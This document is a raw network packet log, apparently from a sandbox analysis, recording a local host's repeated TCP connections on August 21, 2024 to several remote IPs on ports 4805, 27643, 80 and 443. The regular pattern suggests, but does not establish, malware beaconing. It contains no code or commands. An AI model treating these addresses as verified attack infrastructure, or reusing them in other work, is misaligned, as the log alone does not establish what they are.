                                      Aug 21, 2024 10:59:33.554282904 CEST480560049135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:33.554364920 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:33.554661036 CEST600494805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:33.599553108 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.602505922 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.602524996 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.745687962 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.745764971 CEST44360050162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:33.745822906 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:33.746284008 CEST60050443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:34.106190920 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.111279011 CEST276436005145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:34.113084078 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.113904953 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.118664026 CEST276436005145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:34.941169977 CEST276436005145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:34.941226959 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:34.941572905 CEST6005127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:35.024805069 CEST6004880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.030981064 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.035968065 CEST806005245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:35.036073923 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.036703110 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:35.042880058 CEST806005245.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:38.557849884 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:38.562693119 CEST480560053135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:38.563304901 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:38.563556910 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:38.568315983 CEST480560053135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:38.760745049 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:38.760782957 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:38.760853052 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:38.761413097 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:38.761429071 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.132180929 CEST6005280192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.169303894 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.174190998 CEST806005545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:39.178244114 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.182205915 CEST6005580192.168.2.445.9.20.13
                                      Aug 21, 2024 10:59:39.187022924 CEST806005545.9.20.13192.168.2.4
                                      Aug 21, 2024 10:59:39.252649069 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.253897905 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:39.253930092 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.386362076 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.386425018 CEST44360054162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:59:39.386512995 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:39.387341976 CEST60054443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:59:39.948266983 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:39.953201056 CEST276436005645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:39.955461979 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:39.955493927 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:39.960369110 CEST276436005645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:40.445848942 CEST480560053135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:59:40.446115017 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:40.446521997 CEST600534805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:59:40.781040907 CEST276436005645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:59:40.781438112 CEST6005627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:59:40.781568050 CEST6005627643192.168.2.445.142.215.47
Aug 21, 2024 10:59:43.196400881 CEST | 60055 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:43.203114986 CEST | 60057 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:43.209642887 CEST | 80 | 60057 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:43.209760904 CEST | 60057 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:43.212670088 CEST | 60057 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:43.217509031 CEST | 80 | 60057 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:44.403706074 CEST | 60058 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:44.403753996 CEST | 443 | 60058 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:44.403984070 CEST | 60058 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:44.404326916 CEST | 60058 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:44.404341936 CEST | 443 | 60058 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:44.902261019 CEST | 443 | 60058 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:44.903455973 CEST | 60058 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:44.903486967 CEST | 443 | 60058 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:45.053332090 CEST | 443 | 60058 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:45.053405046 CEST | 443 | 60058 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:45.053539038 CEST | 60058 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:45.054155111 CEST | 60058 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:45.463296890 CEST | 60059 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:45.678067923 CEST | 4805 | 60059 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:45.678154945 CEST | 60059 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:45.678692102 CEST | 60059 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:45.683523893 CEST | 4805 | 60059 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:45.791548967 CEST | 60060 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:45.796411037 CEST | 27643 | 60060 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:45.796503067 CEST | 60060 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:45.796799898 CEST | 60060 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:45.803147078 CEST | 27643 | 60060 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:46.622867107 CEST | 27643 | 60060 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:46.623024940 CEST | 60060 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:46.623174906 CEST | 60060 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:47.213151932 CEST | 60057 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:47.224504948 CEST | 60061 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:47.229434013 CEST | 80 | 60061 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:47.229525089 CEST | 60061 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:47.230123997 CEST | 60061 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:47.234957933 CEST | 80 | 60061 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:47.378330946 CEST | 4805 | 60059 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:47.379283905 CEST | 60059 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:47.379518032 CEST | 60059 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:50.056277037 CEST | 60062 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:50.056313992 CEST | 443 | 60062 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:50.056512117 CEST | 60062 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:50.056721926 CEST | 60062 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:50.056735039 CEST | 443 | 60062 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:50.532679081 CEST | 443 | 60062 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:50.533987045 CEST | 60062 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:50.534008026 CEST | 443 | 60062 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:50.692766905 CEST | 443 | 60062 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:50.692836046 CEST | 443 | 60062 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:50.692898989 CEST | 60062 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:50.693494081 CEST | 60062 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:51.243221045 CEST | 60061 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:51.246967077 CEST | 60063 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:51.251890898 CEST | 80 | 60063 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:51.251966000 CEST | 60063 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:51.252470970 CEST | 60063 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:51.257280111 CEST | 80 | 60063 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:51.634769917 CEST | 60064 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:51.639759064 CEST | 27643 | 60064 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:51.641479015 CEST | 60064 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:51.641721010 CEST | 60064 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:51.646512985 CEST | 27643 | 60064 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:52.385037899 CEST | 60065 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:52.391580105 CEST | 4805 | 60065 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:52.392471075 CEST | 60065 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:52.393034935 CEST | 60065 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:52.397886038 CEST | 4805 | 60065 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:52.478357077 CEST | 27643 | 60064 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:52.481573105 CEST | 60064 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:52.481699944 CEST | 60064 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:54.082586050 CEST | 4805 | 60065 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:54.082761049 CEST | 60065 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:54.082978010 CEST | 60065 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:55.253880978 CEST | 60063 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:55.327219963 CEST | 60066 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:55.332305908 CEST | 80 | 60066 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:55.333646059 CEST | 60066 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:55.336297989 CEST | 60066 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:55.341098070 CEST | 80 | 60066 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:55.700910091 CEST | 60067 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:55.700949907 CEST | 443 | 60067 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:55.701021910 CEST | 60067 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:55.701323986 CEST | 60067 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:55.701339006 CEST | 443 | 60067 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:56.167371035 CEST | 443 | 60067 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:56.169116020 CEST | 60067 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:56.169152021 CEST | 443 | 60067 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:56.302083015 CEST | 443 | 60067 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:56.302159071 CEST | 443 | 60067 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 10:59:56.302212954 CEST | 60067 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:56.302704096 CEST | 60067 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 10:59:57.494223118 CEST | 60068 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:57.499238968 CEST | 27643 | 60068 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:57.499339104 CEST | 60068 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:57.499473095 CEST | 60068 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:57.504224062 CEST | 27643 | 60068 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:58.313865900 CEST | 27643 | 60068 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 10:59:58.316350937 CEST | 60068 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:58.321096897 CEST | 60068 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 10:59:59.088227034 CEST | 60069 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:59.093923092 CEST | 4805 | 60069 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:59.094007015 CEST | 60069 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:59.094541073 CEST | 60069 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 10:59:59.099955082 CEST | 4805 | 60069 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 10:59:59.336870909 CEST | 60066 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:59.342303038 CEST | 60070 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:59.347229004 CEST | 80 | 60070 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 10:59:59.347367048 CEST | 60070 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:59.347681999 CEST | 60070 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 10:59:59.352458954 CEST | 80 | 60070 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:00.806212902 CEST | 4805 | 60069 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:00.806494951 CEST | 60069 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:00.807152987 CEST | 60069 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:01.309359074 CEST | 60071 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:01.309406996 CEST | 443 | 60071 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:01.309484005 CEST | 60071 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:01.309906006 CEST | 60071 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:01.309921026 CEST | 443 | 60071 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:01.801673889 CEST | 443 | 60071 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:01.802793026 CEST | 60071 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:01.802828074 CEST | 443 | 60071 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:01.948796988 CEST | 443 | 60071 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:01.948868990 CEST | 443 | 60071 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:01.948930979 CEST | 60071 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:01.949361086 CEST | 60071 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:03.373374939 CEST | 60072 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:03.378324032 CEST | 27643 | 60072 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:03.378415108 CEST | 60072 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:03.396174908 CEST | 60072 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:03.401091099 CEST | 27643 | 60072 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:03.490004063 CEST | 60070 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:03.532998085 CEST | 60073 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:03.537806988 CEST | 80 | 60073 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:03.537889004 CEST | 60073 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:03.662852049 CEST | 60073 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:03.667653084 CEST | 80 | 60073 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:04.205818892 CEST | 27643 | 60072 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:04.205889940 CEST | 60072 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:04.206201077 CEST | 60072 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:05.824529886 CEST | 60074 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:05.829540968 CEST | 4805 | 60074 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:05.830493927 CEST | 60074 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:05.830737114 CEST | 60074 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:05.835552931 CEST | 4805 | 60074 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:06.962234020 CEST | 60075 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:06.962326050 CEST | 443 | 60075 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:06.962421894 CEST | 60075 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:06.962759018 CEST | 60075 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:06.962791920 CEST | 443 | 60075 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:07.426095009 CEST | 443 | 60075 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:07.427736998 CEST | 60075 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:07.427814960 CEST | 443 | 60075 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:07.520327091 CEST | 4805 | 60074 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:07.520411968 CEST | 60074 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:07.520844936 CEST | 60074 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:07.577842951 CEST | 443 | 60075 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:07.577919960 CEST | 443 | 60075 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:07.578125000 CEST | 60075 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:07.578541994 CEST | 60075 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:07.649429083 CEST | 60073 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:07.652296066 CEST | 60076 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:07.657152891 CEST | 80 | 60076 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:07.657375097 CEST | 60076 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:07.657536030 CEST | 60076 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:07.662556887 CEST | 80 | 60076 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:09.213473082 CEST | 60077 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:09.218288898 CEST | 27643 | 60077 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:09.218381882 CEST | 60077 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:09.218625069 CEST | 60077 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:09.223418951 CEST | 27643 | 60077 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:10.034812927 CEST | 27643 | 60077 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:10.034887075 CEST | 60077 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:10.035134077 CEST | 60077 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:11.667366982 CEST | 60076 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:11.678436995 CEST | 60078 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:11.683356047 CEST | 80 | 60078 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:11.683435917 CEST | 60078 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:11.684684992 CEST | 60078 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:11.689527035 CEST | 80 | 60078 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:12.525702953 CEST | 60079 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:12.530659914 CEST | 4805 | 60079 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:12.530771017 CEST | 60079 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:12.531007051 CEST | 60079 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:12.535871029 CEST | 4805 | 60079 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:12.588711023 CEST | 60080 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:12.588759899 CEST | 443 | 60080 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:12.588876963 CEST | 60080 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:12.589148998 CEST | 60080 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:12.589163065 CEST | 443 | 60080 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:13.059813976 CEST | 443 | 60080 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:13.064462900 CEST | 60080 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:13.064485073 CEST | 443 | 60080 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:13.206705093 CEST | 443 | 60080 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:13.206773996 CEST | 443 | 60080 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:13.206835032 CEST | 60080 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:13.207597017 CEST | 60080 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:14.222798109 CEST | 4805 | 60079 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:14.222872019 CEST | 60079 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:14.223074913 CEST | 60079 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:15.041238070 CEST | 60081 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:15.046426058 CEST | 27643 | 60081 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:15.047322989 CEST | 60081 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:15.047471046 CEST | 60081 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:15.052263975 CEST | 27643 | 60081 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:15.696827888 CEST | 60078 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:15.702891111 CEST | 60082 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:15.707808971 CEST | 80 | 60082 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:15.707900047 CEST | 60082 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:15.708468914 CEST | 60082 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:15.713249922 CEST | 80 | 60082 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:15.871196985 CEST | 27643 | 60081 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:15.871462107 CEST | 60081 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:15.871537924 CEST | 60081 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:18.244821072 CEST | 60083 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:18.244868994 CEST | 443 | 60083 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:18.244946003 CEST | 60083 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:18.247318029 CEST | 60083 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:18.247330904 CEST | 443 | 60083 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:18.722064972 CEST | 443 | 60083 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:18.723619938 CEST | 60083 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:18.723639965 CEST | 443 | 60083 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:18.862787008 CEST | 443 | 60083 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:18.862863064 CEST | 443 | 60083 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:18.862951040 CEST | 60083 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:18.863440990 CEST | 60083 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:19.228851080 CEST | 60084 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:19.234541893 CEST | 4805 | 60084 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:19.235368967 CEST | 60084 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:19.236943007 CEST | 60084 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:19.242407084 CEST | 4805 | 60084 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:19.697545052 CEST | 60082 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:19.705856085 CEST | 60085 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:19.948879004 CEST | 80 | 60085 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:19.948964119 CEST | 60085 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:20.270778894 CEST | 60085 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:20.275825977 CEST | 80 | 60085 | 45.9.20.13 | 192.168.2.4
